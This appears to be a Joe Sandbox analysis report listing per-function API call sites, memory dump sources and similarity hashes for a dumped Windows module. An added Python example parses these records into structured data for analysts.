                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocSize
                                                      • String ID:
                                                      • API String ID: 2549470565-0
                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction ID: 571ec14e998341a004c35bb6ac4a439367390e3f58948ef0e1355a89bf5dbd93
                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction Fuzzy Hash: 46213062A09786A6EF15EB11E441678F6A1FB89B80BDC9432DA0F03754DFBCE941C721
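Each of the blocks above is one function fingerprint produced by the Joe Sandbox IDA plugin over the dumped module: the raw API call sites (`ref:` is the virtual address of the call site, and `Part of subcall function` marks a call made from a callee rather than from the function itself), the memory dump region the code was lifted from, and the Similarity keys meant for comparing the function against other samples (the `$`-joined API ID and String ID plus the Opcode and Instruction fuzzy hashes). On this page the `Download File` link label has been fused onto the Associated dump names by extraction. The parser below is added here as an example and is not Joe Sandbox code; it turns such records into structured data a practitioner can pivot on, strips the link residue, converts call sites into image-relative offsets that can be matched against the on-disk PE, and splits the dump file name into fields. The meaning of the dotted `.sdmp` name fields is an assumption inferred from the pattern on the page (the first field matches the process number in `hcaresult_5_2_7ff7e1db0000_alpha.jbxd`, the fourth is the region start, and the fifth looks like a Windows PAGE_* protection value: 0x20 for the code region, 0x04 and 0x02 for the data and header regions), not a documented format. `SAMPLE` is constructed from fields copied off the page.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity blocks) into
data to pivot on. Added example, not Joe Sandbox code; .sdmp field meanings are an assumption."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # link label fused onto file names by HTML extraction
API_CALL_RE = re.compile(  # "Part of subcall function X: api.mod(args), ref: A" or "api.mod ref: A"
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<api>\w+)\.(?P<mod>[\w\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+?\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                       # virtual address of the call site
    subcall_of: int | None = None  # callee address when listed as "Part of subcall function"

@dataclass
class FunctionRecord:
    api_calls: list[ApiCall] = field(default_factory=list)
    associated: list[str] = field(default_factory=list)   # other dumps of the same module
    fields: dict[str, str] = field(default_factory=dict)  # "Key: Value" bullets, verbatim

def tokens(record: FunctionRecord, key: str) -> list[str]:
    """'$'-separated values of e.g. 'API ID' or 'String ID' ('Heap$Process$AllocSize')."""
    return [t for t in record.fields.get(key, "").split("$") if t]

def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip().replace(LINK_RESIDUE, "")
        if line in SECTION_HEADERS:  # an 'APIs' header opens a new per-function record
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if not line or current is None or section == "Strings":  # Strings are collapsed on the page
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_CALL_RE.match(body)
            if m:
                current.api_calls.append(ApiCall(
                    api=m["api"], module=m["mod"],
                    args=[a for a in (m["args"] or "").split(",") if a],
                    ref=int(m["ref"], 16), subcall_of=int(m["sub"], 16) if m["sub"] else None))
        elif body.startswith("Associated: "):
            current.associated.append(body[len("Associated: "):])
        else:
            key, sep, value = body.partition(":")
            if sep:
                current.fields[key.strip()] = value.strip()
    return records

def decode_sdmp_name(name: str) -> dict:
    """ASSUMPTION from the naming pattern on the page, not a documented format: field 1 is the
    process number (matches hcaresult_5_2_...), field 4 the region start, field 5 a PAGE_* value."""
    parts = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    return {"process": int(parts[0]), "round": int(parts[1]), "dump_id": parts[2],
            "region_start": int(parts[3], 16), "protection": int(parts[4], 16)}

def source_info(record: FunctionRecord) -> dict:
    m = SOURCE_RE.match(record.fields["Source File"])
    info = decode_sdmp_name(m["file"])
    info["image_base"], info["based_on_pe"] = int(m["off"], 16), m["pe"] == "true"
    return info

def is_executable(protection: int) -> bool:
    return bool(protection & 0xF0)  # PAGE_EXECUTE* values are 0x10, 0x20, 0x40, 0x80

def rva(record: FunctionRecord, call: ApiCall) -> int:
    return call.ref - source_info(record)["image_base"]  # offset to look up in the on-disk PE

SAMPLE = """\
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6D0
Memory Dump Source
• Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: Heap$Process$AllocSize
• String ID:
• Instruction Fuzzy Hash: 46213062A09786A6EF15EB11E441678F6A1FB89B80BDC9432DA0F03754DFBCE941C721
APIs
  • Part of subcall function 00007FF7E1DC33A8: iswspace.MSVCRT(?,?,00000000,00007FF7E1DDD6EE), ref: 00007FF7E1DC33C0
• GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC3D0C
Memory Dump Source
• Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
Similarity
• API ID: iswspace
• String ID: off
"""
```

Calling `parse_records(SAMPLE)` yields two records; `rva()` on the first call site gives 0xB6D0, which is where the GetProcessHeap call would be found in the on-disk copy of the image, and `decode_sdmp_name()` on the Associated entry reports protection 0x02, a read-only region, while the Source File region reports 0x20. Real report pages carry the `Joe Sandbox IDA Plugin` and `Strings` headers as well; both are accepted and folded into `fields` or skipped.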
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56C5
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD56D9
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56FD
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD5711
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction ID: cc9ee712fcb45e9e591c36c146fc6c95fb86678877c0b0cef4b1eb6d2d983d9a
                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction Fuzzy Hash: 50112572A04B81D6EB04AF56E4041A8BBB0FB89F85B988136DB4E03718DF38E456C750
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DCEE64
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DCEE78
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                      • String ID:
                                                      • API String ID: 2759988882-0
                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction ID: 567964930ba76a32a938d1862c05fe4f1771baacec405612afa27c4989fefbf7
                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction Fuzzy Hash: B4F04F60F05B42D6EF09FB659406278EDD1FF8EB42B88C475CD0E82350EE7CA4048722
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 1606018815-0
                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction ID: 30f8c1e0b5b06d5ad0a2cf184225881abd714b78e80bb3611b4bd5cb7713cf61
                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction Fuzzy Hash: D8F01C36A24A42DBD708AB11E445279FA60FB8AB03F84A275DA0B42394DF7CD0098B11
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitle
                                                      • String ID: -
                                                      • API String ID: 3358957663-3695764949
                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction ID: 0cd3a84456ac453b714a8d37487b883b83d13ff4d6a8d57bb64b35d5efe4401e
                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction Fuzzy Hash: 7B31BE21A0874296EB04FB11A802778EAA4FF49B90FD84536CE1E077D5DFBCE451C766
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpswscanf
                                                      • String ID: :EOF
                                                      • API String ID: 1534968528-551370653
                                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction ID: 2d01179304bbf9fa4548cb77de255d9e64bba176bb420da9d8aa8353f27c9f5a
                                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction Fuzzy Hash: E8319431E0864286FB14FB15A4423B8F6A0EF48B60FC48933DA5D46295DFBCE851C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3$3
                                                      • API String ID: 0-2538865259
                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction ID: 15e4e2377db0bf05f138cde5718331c6110736e0716ade626e9b2591930cdf23
                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction Fuzzy Hash: 69018BB0D0A582AAF708FB20A882774F620BF49315FD40537C40F055A5CFBC69A4C663
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction ID: 8e685b6937952020c12e089b69927045cdd6f5b4d7e893a82159c8c06c237c6e
                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction Fuzzy Hash: 43416D75A0964686EB18EB10E44227EF7A0FF49B40FD48436C64D03794DFBCA550CBA1